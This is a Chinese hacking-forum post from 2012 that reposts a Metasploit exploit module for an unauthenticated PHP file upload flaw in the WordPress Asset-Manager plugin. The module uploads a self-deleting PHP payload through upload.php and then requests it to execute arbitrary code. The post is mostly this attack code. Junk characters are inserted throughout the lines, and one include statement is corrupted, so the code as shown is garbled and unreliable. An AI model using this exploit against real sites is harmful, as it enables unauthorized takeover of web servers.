找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2114|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。, p7 ~% }( V0 _: F9 b( K3 }) G( ?
7 O  N* t! H% ^" z) l
##( B, _- D: w3 @* A1 Z  C
# This file is part of the Metasploit Framework and may be subject to
2 R% M" @/ Q; a; T8 }# redistribution and commercial restrictions. Please see the Metasploit* R8 T6 ~/ e! V& m
# Framework web site for more information on licensing and terms of use.
, @  E3 Z# b) s  X" [: x#   http://metasploit.com/framework/2 i  Y0 q3 N" A" d- t
##
+ w' o) B! }# @+ M6 r9 r3 I 0 O! L- T( I* a" n6 P: K
require 'msf/core': z% D& T. J5 G1 M0 j7 @0 ?/ R
require 'msf/core/exploit/php_exe'
1 f, ?4 F9 F6 y7 T) B7 G& y : _1 l, d' X- U/ N: |3 f) s. b
class Metasploit3 < Msf::Exploit::Remote
4 ]5 F3 t4 v+ S  y  Rank = ExcellentRanking2 ^$ A+ Y# M7 i- f
1 }) \$ x6 l, V, l6 T
  include Msf::Exploit::Remote::HttpClient
$ v) B* n6 T% D* @4 M$ W6 P  include Msf::Exploit:hpEXE
& x. R9 B! N2 w2 d: e2 b# b 7 t1 s3 x8 Q; L& t4 ?& _5 {
  def initialize(info = {})" @5 s! n. R, z9 s( H; d
    super(update_info(info,+ w$ L' I& @$ x1 r% L+ a- t
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',. f! _. d$ B9 B) S# n6 `: A' y
      'Description'    => %q{
7 S3 c% o; a. Q" a0 i- L- R        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress9 F7 w  o, O7 p7 Z/ e
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
3 c% _" x' e4 t) [  f+ m        temp directory without authentication, which results in arbitrary code execution.
- g$ K: m+ A% M  t; J5 P# y      },
  X4 P; y! v6 r/ D1 Z      'Author'         =>
+ W' F- X  e4 y/ _+ U3 F        [
5 s4 E: H, \! a9 [8 L& \: Z          'Sammy FORGIT', # initial discovery# k& m3 w- n1 v
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module7 F8 D  J  F7 Q1 ?  c; n1 o9 ?
        ],/ E9 w) H, Q! {* d9 ]2 ?
      'License'        => MSF_LICENSE,
1 ~0 m, G4 ]3 ~7 ^5 O$ S      'References'     =>4 V% t% D! w. ~+ k3 {; b) J- ?* k
        [5 A, w' D! k3 _
          [ 'OSVDB', '82653' ],$ J6 q1 j8 Z# Y
          [ 'BID', '53809' ],
. l$ m+ D& E4 c9 q          [ 'EDB', '18993' ],
5 z- X3 T. Q8 J9 k$ K( p* k          [ 'URL', 'http:// www.myhack58.com /' ]; J# b# j+ ]; I8 W* Z2 o
        ],; }) H9 a1 j/ L# b. |  P) J
      'Payload'       =>
* Z6 M& W3 I7 r# \* u        {
7 N% m* F- z6 m- ?0 X$ m& S/ R          'BadChars' => "\x00",% q$ ?- E1 l$ g" k$ [% s
        },
5 S' o9 ?, b" x  I- f      'Platform'       => 'php',8 ?8 r$ D) S; f. N; M
      'Arch'           => ARCH_PHP,
1 m3 J3 D7 y  g# S1 c      'Targets'        =>7 R, g# A2 y% u5 |
        [* d1 G0 ]- r; `
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],9 A$ e8 \+ h1 o% R
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]0 N  W# `8 b: C: x. J% m
        ],; g; m: e  }/ w, m" x3 O6 S- u
      'DefaultTarget' => 0,# `; R8 ~6 E9 Q8 G4 u
      'DisclosureDate' => 'May 26 2012'))# u$ ^) _2 o1 K! I. x7 a  E

8 K. k! I* @) C/ B' d/ h. f2 k    register_options(' i# }/ l( A6 y5 W! {' Z
      [
" D( Z# |, v0 F& F4 h; A' ?        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']), n1 `4 r8 r# i# `1 ^- Y; Q5 G, C) ]! q
      ], self.class)% |) K' L: C) N  @1 l, I
  end
: Q5 \% }& e3 ?. W 7 O; S  p. H6 r
  def exploit
# F; }+ U# I4 g/ s4 x; b5 E    uri =  target_uri.path( ^3 {$ u- Y+ I# D
    uri << '/' if uri[-1,1] != '/'
/ {9 F& _) |( q* C/ [    peer = "#{rhost}:#{rport}"
$ T& g& R! W4 C, H- u8 v    payload_name = "#{rand_text_alpha(5)}.php"
! h0 \# {1 O5 Q7 t. c    php_payload = get_write_exec_payload(:unlink_self=>true)
, G/ R5 y( ?; g* L* ~+ f 1 f- [/ E9 Q# g2 G) {
    data = Rex::MIME::Message.new
! N2 k. H9 L  I0 Z& ?8 W2 b. d    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
! A8 U9 m0 W7 U. @& Z    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'): D/ N5 }( i6 w& X. `8 R  G

" V" o6 |; }6 A  }    print_status("#{peer} - Uploading payload #{payload_name}")" E" Z  z' Q/ S- S6 r1 f! X
    res = send_request_cgi({& l1 t# V  Z/ Y" |/ ]
      'method'  => 'POST',: R# l; I( f) W* k5 m2 B5 S! y
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",7 `& m6 w# Z3 y: F3 U& Q
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",8 U' C, C5 F7 J  l( H
      'data'    => post_data1 U# g/ U* ]; Z* d  i" a0 {+ Y
    }): J) f" Y/ R  }3 V! g- g$ ~6 Q

- Y4 G% p7 {( x, L$ L: [* E) F    if not res or res.code != 200 or res.body !~ /#{payload_name}/$ A4 e1 U' z6 H0 h, z1 \
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")& Q/ l, D3 b: E  b) k! N) i: }
end) V) g2 |7 R/ a9 [1 U% I, [8 m
; D, f) [3 z- `
    print_status("#{peer} - Executing payload #{payload_name}")
" z1 n$ V0 s3 p& I* @+ |7 \    res = send_request_raw({
0 ]9 y$ r; @1 w- ]      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}"," H& u# `- T9 `
      'method'  => 'GET'
! |: A9 a/ [, x1 B0 y    })
1 H! S0 m7 v; k
8 w3 n8 X* ^+ M" u7 d    if res and res.code != 200
6 }/ y2 r2 Q  q: b4 M      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")( |  x" ^3 x: D: W7 b3 ^
    end1 {( n( B* L1 o8 r
  end
1 E4 m1 E3 @5 Y7 }" Pend6 ^3 M+ n0 l2 c0 {. w1 y! I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表